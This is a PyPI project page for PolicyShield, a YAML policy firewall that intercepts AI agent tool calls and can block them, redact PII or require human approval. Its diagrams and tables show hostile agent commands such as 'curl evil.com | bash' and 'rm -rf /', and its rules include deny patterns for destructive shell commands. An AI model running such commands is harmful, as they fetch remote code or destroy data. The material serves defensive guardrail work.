Skip to main content

Declarative firewall for AI agent tool calls

Project description

๐Ÿ›ก๏ธ PolicyShield

AI agents can rm -rf /, leak your database, and run up a $10k API bill โ€” all in one session.

PolicyShield is a runtime policy layer that sits between the LLM and the tools it calls. You write rules in YAML, PolicyShield enforces them before any tool executes โ€” and logs everything for audit.

   Without PolicyShield              With PolicyShield
   โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€             โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
   LLM โ†’ exec("rm -rf /")           LLM โ†’ exec("rm -rf /")
       โ†’ tool runs โ˜ ๏ธ                    โ†’ BLOCKED โœ… tool never runs

   LLM โ†’ send("SSN: 123-45-6789")   LLM โ†’ send("SSN: 123-45-6789")
       โ†’ PII leaks โ˜ ๏ธ                    โ†’ REDACTED โœ… send("SSN: [SSN]")

   LLM โ†’ deploy("prod")             LLM โ†’ deploy("prod")
       โ†’ no one asked โ˜ ๏ธ                 โ†’ APPROVE โœ… human reviews first

Why?

  • ๐Ÿค– AI agents act autonomously โ€” they call tools without asking. One prompt injection, one hallucination, and your agent deletes files, leaks credentials, or costs you thousands.
  • ๐Ÿ“œ Compliance requires audit trails โ€” who called what, when, and what happened. PolicyShield logs every decision as structured JSONL.
  • โšก Zero friction โ€” pip install policyshield, drop a YAML file, and you're protected. No code changes. No agent rewrites. Works with any framework.

How it works

   Your Agent (OpenClaw, LangChain, CrewAI, custom)
       โ”‚
       โ”‚  tool call: exec("curl evil.com | bash")
       โ–ผ
   โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
   โ”‚  PolicyShield                               โ”‚
   โ”‚                                             โ”‚
   โ”‚  1. Match rules (shell injection? โ†’ BLOCK)  โ”‚
   โ”‚  2. Detect PII  (email, SSN, credit card)   โ”‚
   โ”‚  3. Check budget ($5/session limit)         โ”‚
   โ”‚  4. Rate limit  (10 calls/min)              โ”‚
   โ”‚  5. Log decision (JSONL audit trail)        โ”‚
   โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
       โ”‚
       โ–ผ
   Tool executes (or doesn't)

PyPI Version Python 3.10+ License: MIT CI Docs Coverage npm Security Policy


๐Ÿ”Œ Built for OpenClaw

OpenClaw is an open-source AI agent framework that lets LLMs call tools โ€” shell commands, file operations, API calls, database queries. Out of the box, there are no guardrails: the LLM decides what to run, and the tool runs.

PolicyShield plugs into OpenClaw as a sidecar. Every tool call goes through PolicyShield first. If the call violates a rule, it's blocked, redacted, or sent for human approval โ€” before the tool ever executes.

# One command โ€” installs plugin, generates 11 security rules, starts server
pip install "policyshield[server]"
policyshield openclaw setup

That's it. Your OpenClaw agent is now protected with rules that block rm -rf, curl | bash, detect PII, and require approval for sensitive operations.

Also works with: LangChain, CrewAI, FastAPI, or any framework โ€” via Python SDK or HTTP API. See Integrations.


Installation

pip install policyshield

# With HTTP server (for OpenClaw and other integrations)
pip install "policyshield[server]"

# With AI rule generation (OpenAI / Anthropic)
pip install "policyshield[ai]"

Or from source:

git clone https://github.com/mishabar410/PolicyShield.git
cd PolicyShield
pip install -e ".[dev,server]"

Quick Start (Standalone)

Step 1. Create a rules file rules.yaml:

shield_name: my-agent
version: 1
rules:
  - id: no-delete
    when:
      tool: delete_file
    then: block
    message: "File deletion is not allowed."

  - id: redact-pii
    when:
      tool: [web_fetch, send_message]
    then: redact
    message: "PII redacted before sending."

Step 2. Use in Python:

from policyshield.shield.engine import ShieldEngine

engine = ShieldEngine(rules="rules.yaml")

# This will be blocked:
result = engine.check("delete_file", {"path": "/data"})
print(result.verdict)  # Verdict.BLOCK
print(result.message)  # "File deletion is not allowed."

# This will redact PII from args:
result = engine.check("send_message", {"text": "Email me at john@corp.com"})
print(result.verdict)  # Verdict.REDACT
print(result.modified_args)  # {"text": "Email me at [EMAIL]"}

Step 3. Validate your rules:

policyshield validate rules.yaml
policyshield lint rules.yaml

Or scaffold a full project:

# Secure preset: default BLOCK, fail-closed, 5 built-in detectors
policyshield init --preset secure --no-interactive

# Check your security posture
policyshield doctor

โšก OpenClaw Integration

PolicyShield works as a sidecar to OpenClaw โ€” it intercepts every tool call the LLM makes and enforces your rules before the tool executes.

  OpenClaw Agent                PolicyShield Server
  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”              โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
  โ”‚  LLM calls   โ”‚  HTTP check  โ”‚  11 YAML rules   โ”‚
  โ”‚  exec("rmโ€ฆ") โ”‚โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ†’ โ”‚  โ†“               โ”‚
  โ”‚              โ”‚   BLOCK โ†โ”€โ”€โ”€โ”€โ”‚  match โ†’ verdict โ”‚
  โ”‚  Tool NOT    โ”‚              โ”‚                  โ”‚
  โ”‚  executed    โ”‚              โ”‚  PII detection   โ”‚
  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜              โ”‚  Rate limiting   โ”‚
                                โ”‚  Audit trail     โ”‚
                                โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Verified with OpenClaw 2026.2.13 and PolicyShield 0.10.0.

Quick Setup (one command)

pip install "policyshield[server]"
policyshield openclaw setup

This runs 5 steps automatically:

Step What happens
1 Generates 11 preset rules in policies/rules.yaml (block rm -rf, curl|sh, redact PII, etc.)
2 Starts the PolicyShield HTTP server on port 8100
3 Downloads @policyshield/openclaw-plugin from npm into ~/.openclaw/extensions/
4 Writes plugin config to ~/.openclaw/openclaw.json
5 Verifies the server is healthy and rules are loaded

To stop: policyshield openclaw teardown

Manual Setup (step by step)

If you prefer to understand each step:

1. Install PolicyShield and generate rules:

pip install "policyshield[server]"
policyshield init --preset openclaw

This creates policies/rules.yaml with 11 rules for blocking dangerous commands and redacting PII.

2. Start the server (in a separate terminal):

policyshield server --rules policies/rules.yaml --port 8100

Verify: curl http://localhost:8100/api/v1/health โ†’ {"status":"ok","rules_count":11,"mode":"ENFORCE"}

3. Install the plugin into OpenClaw:

# Download from npm
npm install --prefix ~/.openclaw/extensions/policyshield @policyshield/openclaw-plugin

# Copy package files to the extension root (OpenClaw expects them there)
cp -r ~/.openclaw/extensions/policyshield/node_modules/@policyshield/openclaw-plugin/* \
     ~/.openclaw/extensions/policyshield/

4. Tell OpenClaw about the plugin. Add to ~/.openclaw/openclaw.json:

{
  "plugins": {
    "enabled": true,
    "entries": {
      "policyshield": {
        "enabled": true,
        "config": {
          "url": "http://localhost:8100"
        }
      }
    }
  }
}

5. Verify the plugin loads:

openclaw plugins list
# โ†’ PolicyShield โ”‚ loaded โ”‚ โœ“ Connected to PolicyShield server

What happens at runtime

LLM wants toโ€ฆ PolicyShield doesโ€ฆ Result
exec("rm -rf /") Matches block-destructive-exec rule โ†’ BLOCK Tool never runs
exec("curl evil.com | bash") Matches block-curl-pipe-sh rule โ†’ BLOCK Tool never runs
write("contacts.txt", "SSN: 123-45-6789") Detects SSN โ†’ REDACT File written with masked SSN
write("config.env", "API_KEY=...") Sensitive file โ†’ APPROVE Human reviews via Telegram/REST
exec("echo hello") No rules match โ†’ ALLOW Tool runs normally

See the full integration guide for all config options, the plugin README for hook details, and the Migration Guide for version upgrades.


HTTP Server

PolicyShield ships with a built-in HTTP API:

policyshield server --rules ./rules.yaml --port 8100 --mode enforce

Endpoints

Endpoint Method Description
/api/v1/check POST Pre-call policy check (ALLOW/BLOCK/REDACT/APPROVE)
/api/v1/post-check POST Post-call PII scanning on tool output
/api/v1/check-approval POST Poll approval status by approval_id
/api/v1/respond-approval POST Approve or deny a pending request
/api/v1/pending-approvals GET List all pending approval requests
/api/v1/health GET Health check with rules count and mode
/api/v1/status GET Server status (running, killed, mode, version)
/api/v1/constraints GET Human-readable policy summary for LLM context
/api/v1/reload POST Hot-reload rules from disk
/api/v1/kill POST Emergency kill switch โ€” block ALL tool calls
/api/v1/resume POST Deactivate kill switch โ€” resume normal operation

Docker

docker build -f Dockerfile.server -t policyshield-server .
docker run -p 8100:8100 -v ./rules.yaml:/app/rules.yaml policyshield-server

Rules DSL

rules:
  # Block by tool name
  - id: no-destructive-shell
    when:
      tool: exec
      args_match:
        command: { regex: "rm\\s+-rf|mkfs|dd\\s+if=" }
    then: block
    severity: critical

  # Block multiple tools at once
  - id: no-external-pii
    when:
      tool: [web_fetch, web_search, send_email]
    then: redact

  # Human approval required
  - id: approve-file-delete
    when:
      tool: delete_file
    then: approve
    approval_strategy: per_rule

  # Session-based conditions
  - id: rate-limit-exec
    when:
      tool: exec
      session:
        tool_count.exec: { gt: 60 }
    then: block
    message: "exec rate limit exceeded"

  # Chain rule: detect data exfiltration
  - id: anti-exfiltration
    when:
      tool: send_email
      chain:
        - tool: read_database
          within_seconds: 120
    then: block
    severity: critical
    message: "Potential data exfiltration: read_database โ†’ send_email"

# Rate limiting
rate_limits:
  - tool: web_fetch
    max_calls: 10
    window_seconds: 60
    per_session: true

# Custom PII patterns
pii_patterns:
  - name: EMPLOYEE_ID
    pattern: "EMP-\\d{6}"

Built-in PII detection: EMAIL, PHONE, CREDIT_CARD, SSN, IBAN, IP, PASSPORT, DOB + custom patterns.


Features

Core

Category What you get
YAML DSL Declarative rules with regex, glob, exact match, session conditions
Verdicts ALLOW ยท BLOCK ยท REDACT ยท APPROVE (human-in-the-loop)
PII Detection EMAIL, PHONE, CREDIT_CARD, SSN, IBAN, IP, PASSPORT, DOB + custom patterns
Built-in Detectors Path traversal, shell injection, SQL injection, SSRF, URL schemes โ€” zero-config
Kill Switch policyshield kill / POST /api/v1/kill โ€” block ALL calls instantly
Chain Rules Temporal conditions (when.chain) โ€” detect multi-step attack patterns
Rate Limiting Per-tool, per-session, global, and adaptive (burst detection) rate limiting
Approval Flow InMemory and Telegram backends with circuit breaker and health checks
Hot Reload File-watcher auto-reloads rules on change
Trace & Audit JSONL log, search, stats, violations, CSV/HTML export, rotation & retention

Server & Integrations

Category What you get
HTTP Server FastAPI server with TLS, API rate limiting, and 11 REST endpoints
OpenClaw Plugin Native plugin with before/after hooks and policy injection
Async Engine Full async/await support for FastAPI, aiohttp, async agents
Input Sanitizer Normalize args, block prompt injection patterns
Output Policy Post-call response scanning with block patterns and size limits
Honeypot Tools Decoy tools that trigger on prompt injection โ€” always block, even in AUDIT mode
Docker Container-ready with Dockerfile.server and docker-compose

Developer Experience

Category What you get
Doctor policyshield doctor โ€” 10-check health scan with A-F security grading
Auto-Rules policyshield generate-rules --from-openclaw โ€” zero-config rule generation
Rule Testing YAML test cases for policies (policyshield test)
Rule Linter Static analysis: 7 checks + multi-file validation + dead rule detection
Replay & Simulation Re-run JSONL traces against new rules (policyshield replay)
Advanced features (shadow mode, canary, dashboards, OTel, etc.)
Category What you get
Rule Composition include: / extends: for rule inheritance and modularity
Plugin System Extensible detector API โ€” register custom detectors without forking
Budget Caps USD-based per-session and per-hour cost limits
Shadow Mode Test new rules in production (dual-path evaluation, no blocking)
Canary Deployments Roll out rules to N% of sessions, auto-promote after duration
Dynamic Rules Fetch rules from HTTP/HTTPS with periodic refresh
OpenTelemetry OTLP export to Jaeger/Grafana (spans + metrics)
AI Rule Writer Generate YAML rules from natural language (policyshield generate)
Cost Estimator Token/dollar cost estimation per tool call and model
Alert Engine 5 condition types with Console, Webhook, Slack, Telegram backends
Dashboard FastAPI REST API + WebSocket live stream + dark-themed SPA
Prometheus /metrics endpoint with per-tool, PII, and approval labels + Grafana preset
Compliance Reports HTML reports: verdicts, violations, PII stats, rule coverage
Incident Timeline Chronological session timeline for post-mortems
Config Migration policyshield migrate โ€” auto-migrate YAML between versions

Other Integrations

LangChain

from policyshield.integrations.langchain import PolicyShieldTool, shield_all_tools

safe_tool = PolicyShieldTool(wrapped_tool=my_tool, engine=engine)
safe_tools = shield_all_tools([tool1, tool2], engine)

CrewAI

from policyshield.integrations.crewai import shield_crewai_tools

safe_tools = shield_crewai_tools([tool1, tool2], engine)

CLI

policyshield validate ./policies/          # Validate rules
policyshield lint ./policies/rules.yaml    # Static analysis (7 checks)
policyshield test ./policies/              # Run YAML test cases

policyshield server --rules ./rules.yaml   # Start HTTP server
policyshield server --rules ./rules.yaml --port 8100 --mode audit
policyshield server --rules ./rules.yaml --tls-cert cert.pem --tls-key key.pem

policyshield trace show ./traces/trace.jsonl
policyshield trace violations ./traces/trace.jsonl
policyshield trace stats --dir ./traces/ --format json
policyshield trace search --tool exec --verdict BLOCK
policyshield trace cost --dir ./traces/ --model gpt-4o
policyshield trace export ./traces/trace.jsonl -f html

# Launch the live web dashboard
policyshield trace dashboard --port 8000 --prometheus

# Replay traces against new rules
policyshield replay ./traces/trace.jsonl --rules ./new-rules.yaml --changed-only

# Simulate a rule without traces
policyshield simulate --rule new_rule.yaml --tool exec --args '{"cmd":"ls"}'

# Generate rules from templates (offline)
policyshield generate --template --tools delete_file send_email -o rules.yaml

# Generate rules with AI (requires OPENAI_API_KEY)
policyshield generate "Block all file deletions and require approval for deploys"

# Auto-generate rules from OpenClaw or tool list
policyshield generate-rules --from-openclaw --url http://localhost:3000
policyshield generate-rules --tools exec,write_file,delete_file -o policies/rules.yaml

# Compliance report for auditors
policyshield report --traces ./traces/ --format html

# Incident timeline for post-mortems
policyshield incident session_abc123 --format html

# Config migration between versions
policyshield migrate --from 0.11 --to 1.0 rules.yaml

# Kill switch โ€” emergency stop
policyshield kill --port 8100 --reason "Incident response"
policyshield resume --port 8100

# Health check
policyshield doctor --config policyshield.yaml --rules rules.yaml
policyshield doctor --json

# Initialize a new project
policyshield init --preset secure --no-interactive

Docker

# Run the HTTP server
docker build -f Dockerfile.server -t policyshield-server .
docker run -p 8100:8100 -v ./rules:/app/rules policyshield-server

# Validate rules
docker compose run policyshield validate policies/

# Lint rules
docker compose run lint

# Run tests
docker compose run test

Examples

Example Description
langchain_demo.py LangChain tool wrapping
async_demo.py Async engine usage
openclaw_rules.yaml OpenClaw preset rules (11 rules)
chain_rules.yaml Chain rule examples (anti-exfiltration, retry storm)
policies/ Production-ready rule sets (security, compliance, full)

Community Rule Packs

Pack Rules Focus
gdpr.yaml 8 EU data protection, cross-border transfers
hipaa.yaml 9 PHI protection, patient record safety
pci-dss.yaml 9 Cardholder data, payment gateway enforcement

How does PolicyShield compare to alternatives? See the Comparison page.


Benchmarks

Measured on commodity hardware (Apple M-series, Python 3.13). Target: <5ms sync, <10ms async.

Operation p50 p99 Target
Sync check (ALLOW) 0.01ms 0.01ms <5ms โœ…
Sync check (BLOCK) 0.01ms 0.01ms <5ms โœ…
Async check 0.05ms 0.10ms <10ms โœ…

Run benchmarks yourself:

pytest tests/test_benchmark.py -m benchmark -v -s

Troubleshooting

Problem Solution
Connection refused on plugin install Start PolicyShield server first: policyshield server --rules rules.yaml
Server starts but plugin gets timeouts Check port matches โ€” default is 8100. Configure in OpenClaw: openclaw config set plugins.policyshield.url http://localhost:8100
Rules not reloading after edit Hot-reload watches the file passed to --rules. Or call POST /api/v1/reload manually
policyshield: command not found Install with server extra: pip install "policyshield[server]"
PII not detected in non-English text Current PII detector is regex-based (L0). RU patterns (INN, SNILS, passport) are supported. NER-based L1 detection is on the roadmap

For OpenClaw-specific issues, see the full integration guide. For upgrading between versions, see the Compatibility & Migration Guide.


Development

git clone https://github.com/mishabar410/PolicyShield.git
cd PolicyShield
python -m venv .venv && source .venv/bin/activate
pip install -e ".[dev,server]"

pytest tests/ -v                 # 1192+ tests
ruff check policyshield/ tests/  # Lint
ruff format --check policyshield/ tests/  # Format check

๐Ÿ“– Documentation: mishabar410.github.io/PolicyShield


License

MIT

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

policyshield-0.11.0.tar.gz (515.3 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

policyshield-0.11.0-py3-none-any.whl (167.0 kB view details)

Uploaded Python 3

File details

Details for the file policyshield-0.11.0.tar.gz.

File metadata

  • Download URL: policyshield-0.11.0.tar.gz
  • Upload date:
  • Size: 515.3 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.7

File hashes

Hashes for policyshield-0.11.0.tar.gz
Algorithm Hash digest
SHA256 68a957ea895cab12cbcd50604eb21745c53292ad111c2e0d80df205d018d9dcb
MD5 58355444a940743220eca7b8df95de16
BLAKE2b-256 40df9c482e0eb484aa8b569111544395fd9f7971bba9ca8f8609387488c40eca

See more details on using hashes here.

Provenance

The following attestation bundles were made for policyshield-0.11.0.tar.gz:

Publisher: release.yml on mishabar410/PolicyShield

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

File details

Details for the file policyshield-0.11.0-py3-none-any.whl.

File metadata

  • Download URL: policyshield-0.11.0-py3-none-any.whl
  • Upload date:
  • Size: 167.0 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.7

File hashes

Hashes for policyshield-0.11.0-py3-none-any.whl
Algorithm Hash digest
SHA256 0e80f9373a6ad0d49e6a958f35faee5c21a99faa6c16d7ea099363ad58ae4d4d
MD5 c5086614128c87bd2bb63b79b25ccfc8
BLAKE2b-256 4160a4c3adb05b95ed0a43d08da01a71c696919297ab7f8048328b74c62bd909

See more details on using hashes here.

Provenance

The following attestation bundles were made for policyshield-0.11.0-py3-none-any.whl:

Publisher: release.yml on mishabar410/PolicyShield

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page